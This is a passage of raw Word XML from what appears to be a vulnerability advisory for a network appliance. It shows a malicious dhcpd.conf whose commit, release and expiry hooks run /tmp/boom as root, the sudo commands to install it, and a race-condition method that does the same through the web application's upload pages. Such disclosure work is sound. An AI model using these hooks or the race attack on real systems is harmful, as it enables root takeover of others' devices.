          <w:p w14:paraId="05C0D67D" w14:textId="7C3C9713" w:rsidR="00651FD7" w:rsidRDefault="00651FD7" w:rsidP="007C4C45">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    default-lease-time </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>3600 ;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="51F128EA" w14:textId="3B445569" w:rsidR="00651FD7" w:rsidRDefault="00651FD7" w:rsidP="007C4C45">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    max-lease-time </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>3600 ;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="2BBB78FE" w14:textId="10DB6DB2" w:rsidR="00651FD7" w:rsidRDefault="00651FD7" w:rsidP="007C4C45">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    option routers </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>192.168.44.1 ;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="521D75E6" w14:textId="7014AF05" w:rsidR="00651FD7" w:rsidRDefault="00651FD7" w:rsidP="007C4C45">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    option broadcast-address </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>192.168.44.255 ;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="648B4920" w14:textId="77777777" w:rsidR="008C3E48" w:rsidRDefault="008C3E48" w:rsidP="007C4C45">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1448998C" w14:textId="346F7F89" w:rsidR="00651FD7" w:rsidRDefault="00651FD7" w:rsidP="007C4C45">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    # Will run /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/boom</w:t>
            </w:r>
            <w:r w:rsidR="008C3E48">
              <w:t xml:space="preserve"> as root</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> whenever DHCP lease is created</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F40D949" w14:textId="2FF0922E" w:rsidR="00651FD7" w:rsidRDefault="00651FD7" w:rsidP="007C4C45">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    on commit {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05DCB278" w14:textId="7F30E160" w:rsidR="00651FD7" w:rsidRDefault="00651FD7" w:rsidP="007C4C45">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        execute("/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/boom"</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="7EB75D1D" w14:textId="4E8149A2" w:rsidR="00651FD7" w:rsidRDefault="00651FD7" w:rsidP="007C4C45">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50F2B31A" w14:textId="77777777" w:rsidR="008C3E48" w:rsidRDefault="008C3E48" w:rsidP="007C4C45">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5B3A6A01" w14:textId="3617FE81" w:rsidR="00651FD7" w:rsidRDefault="00651FD7" w:rsidP="007C4C45">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    # Will run /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">/boom </w:t>
            </w:r>
            <w:r w:rsidR="008C3E48">
              <w:t xml:space="preserve">as root </w:t>
            </w:r>
            <w:r>
              <w:t>whenever a DHCP lease is released</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53EDF692" w14:textId="68C8A094" w:rsidR="00651FD7" w:rsidRDefault="00651FD7" w:rsidP="007C4C45">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    on release {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73C54426" w14:textId="4A1B0AA3" w:rsidR="00651FD7" w:rsidRDefault="00651FD7" w:rsidP="007C4C45">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        execute(</w:t>
            </w:r>
            <w:r w:rsidR="007C4C45">
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/boom</w:t>
            </w:r>
            <w:r w:rsidR="007C4C45">
              <w:t>"</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="7C4EACFD" w14:textId="09CDD1D4" w:rsidR="00651FD7" w:rsidRDefault="00651FD7" w:rsidP="007C4C45">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37F75C47" w14:textId="77777777" w:rsidR="008C3E48" w:rsidRDefault="008C3E48" w:rsidP="007C4C45">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7667B5E8" w14:textId="4D31D6C2" w:rsidR="00651FD7" w:rsidRDefault="00651FD7" w:rsidP="007C4C45">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    # Will run /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">/boom </w:t>
            </w:r>
            <w:r w:rsidR="008C3E48">
              <w:t xml:space="preserve">as root </w:t>
            </w:r>
            <w:r>
              <w:t>whenever a DHCP lease expires</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B0460E9" w14:textId="67EAA283" w:rsidR="00651FD7" w:rsidRDefault="00651FD7" w:rsidP="007C4C45">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    on expiry {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F696DEF" w14:textId="0A924C4E" w:rsidR="00651FD7" w:rsidRDefault="00651FD7" w:rsidP="007C4C45">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        execute(</w:t>
            </w:r>
            <w:r w:rsidR="007C4C45">
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/boom</w:t>
            </w:r>
            <w:r w:rsidR="007C4C45">
              <w:t>"</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="242D327F" w14:textId="4BC1E8C7" w:rsidR="00651FD7" w:rsidRDefault="00651FD7" w:rsidP="007C4C45">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="741C024A" w14:textId="5B7C123A" w:rsidR="00091BDF" w:rsidRDefault="00651FD7" w:rsidP="007C4C45">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6754567A" w14:textId="77777777" w:rsidR="007C4C45" w:rsidRDefault="007C4C45" w:rsidP="00091BDF"/>
    <w:p w14:paraId="664F74C8" w14:textId="428E22AC" w:rsidR="002D36C9" w:rsidRDefault="002D36C9" w:rsidP="00091BDF">
      <w:r>
        <w:t>The shell commands necessary to install this as admin are as follows</w:t>
      </w:r>
      <w:r w:rsidR="00744FDD">
        <w:t xml:space="preserve"> (similar commands exist for dhcp6s.conf)</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D36C9" w:rsidRPr="009A383C" w14:paraId="275FD2FE" w14:textId="77777777" w:rsidTr="00744FDD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="06632E58" w14:textId="7317D9BE" w:rsidR="002D36C9" w:rsidRDefault="002D36C9" w:rsidP="00744FDD">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t># Write malicious version</w:t>
            </w:r>
            <w:r w:rsidR="008C3E48">
              <w:t xml:space="preserve"> of DHCPD config (with hooks)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> to /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dhcpd.conf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> /bin/mv /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dhcpd.conf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dhcpd.conf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="68C24115" w14:textId="2115A0EF" w:rsidR="002D36C9" w:rsidRPr="009A383C" w:rsidRDefault="00744FDD" w:rsidP="00744FDD">
            <w:pPr>
              <w:pStyle w:val="Console"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t xml:space="preserve">$ sudo </w:t>
            </w:r>
            <w:r w:rsidR="002D36C9" w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="002D36C9" w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>bin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="002D36C9" w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="002D36C9" w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>chmod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="002D36C9" w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t xml:space="preserve"> 664 /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="002D36C9" w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="002D36C9" w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="002D36C9" w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>dhcpd.conf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="7F47C035" w14:textId="34B22CE2" w:rsidR="002D36C9" w:rsidRPr="009A383C" w:rsidRDefault="00744FDD" w:rsidP="00744FDD">
            <w:pPr>
              <w:pStyle w:val="Console"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>$ sudo</w:t>
            </w:r>
            <w:r w:rsidR="002D36C9" w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t xml:space="preserve"> /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="002D36C9" w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>bin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="002D36C9" w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="002D36C9" w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>chown</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="002D36C9" w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="002D36C9" w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>root</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="002D36C9" w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t xml:space="preserve"> /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="002D36C9" w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="002D36C9" w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="002D36C9" w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>dhcpd.conf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="1260D1DD" w14:textId="158583E7" w:rsidR="002D36C9" w:rsidRPr="009A383C" w:rsidRDefault="00744FDD" w:rsidP="00744FDD">
            <w:pPr>
              <w:pStyle w:val="Console"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo </w:t>
            </w:r>
            <w:r w:rsidR="002D36C9" w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t xml:space="preserve"> /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="002D36C9" w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>bin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="002D36C9" w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="002D36C9" w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>chgrp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="002D36C9" w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="002D36C9" w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>susers</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="002D36C9" w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t xml:space="preserve"> /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="002D36C9" w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="002D36C9" w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="002D36C9" w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>dhcpd.conf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3FE7F29B" w14:textId="77777777" w:rsidR="00744FDD" w:rsidRPr="009A383C" w:rsidRDefault="00744FDD" w:rsidP="00091BDF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="641F985B" w14:textId="3EA57222" w:rsidR="000E73C9" w:rsidRDefault="00BF1191" w:rsidP="00091BDF">
      <w:r>
        <w:t xml:space="preserve">The above privilege escalation does not even require command line execution and can </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>actually be</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> performed using only the web application</w:t>
      </w:r>
      <w:r w:rsidR="00433FB3">
        <w:t xml:space="preserve"> via the vulnerabilities described in issue “</w:t>
      </w:r>
      <w:r w:rsidR="00433FB3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00433FB3">
        <w:instrText xml:space="preserve"> REF _Ref58932075 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="00433FB3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00011234">
        <w:t>2) Post-Authentication Remote Code Execution</w:t>
      </w:r>
      <w:r w:rsidR="00433FB3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00433FB3">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="008C3E48">
        <w:t xml:space="preserve"> and “</w:t>
      </w:r>
      <w:r w:rsidR="008C3E48">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008C3E48">
        <w:instrText xml:space="preserve"> REF _Ref59005697 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="008C3E48">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00011234">
        <w:t>3) Sensitive File Disclosure and Apache Misconfiguration</w:t>
      </w:r>
      <w:r w:rsidR="008C3E48">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="008C3E48">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00433FB3">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000E73C9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A44D472" w14:textId="172E6CE9" w:rsidR="00D80750" w:rsidRDefault="000E73C9" w:rsidP="00091BDF">
      <w:r>
        <w:t>When a user attempts to edit the current DHCP configuration</w:t>
      </w:r>
      <w:r w:rsidR="005007F1">
        <w:t xml:space="preserve"> via the web application</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00B525C0">
        <w:t xml:space="preserve">the changes are made to a copy of the </w:t>
      </w:r>
      <w:r w:rsidR="00D80750">
        <w:t xml:space="preserve">current </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D80750">
        <w:t>dhcpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D80750">
        <w:t xml:space="preserve"> configuration that is temporarily </w:t>
      </w:r>
      <w:r w:rsidR="00F64F0F">
        <w:t xml:space="preserve">stored </w:t>
      </w:r>
      <w:r w:rsidR="00D80750">
        <w:t xml:space="preserve">at </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dhcpd.</w:t>
      </w:r>
      <w:r w:rsidR="00433FB3">
        <w:t>conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00433FB3">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="4E2F76D4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F64F0F" w:rsidRPr="4E2F76D4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">1 to </w:t>
      </w:r>
      <w:r w:rsidR="00B525C0" w:rsidRPr="4E2F76D4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="4E2F76D4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> digit number&gt;”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D80750">
        <w:t>before being copied over the existing configuration file at /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D80750">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D80750">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D80750">
        <w:t>dhcpd.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D80750">
        <w:t xml:space="preserve">.  An attacker with admin rights could perform a race </w:t>
      </w:r>
      <w:r w:rsidR="00CA4C9A">
        <w:t xml:space="preserve">condition </w:t>
      </w:r>
      <w:r w:rsidR="00D80750">
        <w:t>attack by continually click</w:t>
      </w:r>
      <w:r w:rsidR="00F64F0F">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00D80750">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00B525C0">
        <w:t>Edit Subnet</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00B525C0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D80750">
        <w:t xml:space="preserve">on a current subnet </w:t>
      </w:r>
      <w:r w:rsidR="00B525C0">
        <w:t>then “Commit Changes and restart DHCPD”</w:t>
      </w:r>
      <w:r w:rsidR="00D80750">
        <w:t>, while simultaneous</w:t>
      </w:r>
      <w:r w:rsidR="00F64F0F">
        <w:t>ly running a</w:t>
      </w:r>
      <w:r w:rsidR="00D80750">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F64F0F">
        <w:t xml:space="preserve">PHP script </w:t>
      </w:r>
      <w:r w:rsidR="00FC32CF">
        <w:t>from</w:t>
      </w:r>
      <w:r w:rsidR="00F64F0F">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F64F0F">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F64F0F">
        <w:t>/ that</w:t>
      </w:r>
      <w:r w:rsidR="00433FB3">
        <w:t xml:space="preserve"> scans /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00433FB3">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00433FB3">
        <w:t xml:space="preserve">/ for a file with the previously mentioned pattern and then performs a </w:t>
      </w:r>
      <w:r w:rsidR="00C6620C">
        <w:t>HTTP or CGI</w:t>
      </w:r>
      <w:r w:rsidR="00433FB3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F64F0F">
        <w:t xml:space="preserve">POST </w:t>
      </w:r>
      <w:r w:rsidR="00433FB3">
        <w:t>request to one of the file upload pages describe in the previously mentioned issue</w:t>
      </w:r>
      <w:r w:rsidR="00FC32CF">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00433FB3">
        <w:t xml:space="preserve"> to replace the file</w:t>
      </w:r>
      <w:r w:rsidR="00F64F0F">
        <w:t xml:space="preserve"> before the edit process copies it to the final location of /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F64F0F">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F64F0F">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F64F0F">
        <w:t>dhcpd.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F64F0F">
        <w:t xml:space="preserve"> (or /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F64F0F">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F64F0F">
        <w:t xml:space="preserve">/dhcp6s.conf). </w:t>
      </w:r>
      <w:r w:rsidR="00433FB3">
        <w:t>Though the attacker would likely not immediately win this race, the attacker could try again and again until achieving success.</w:t>
      </w:r>
    </w:p>
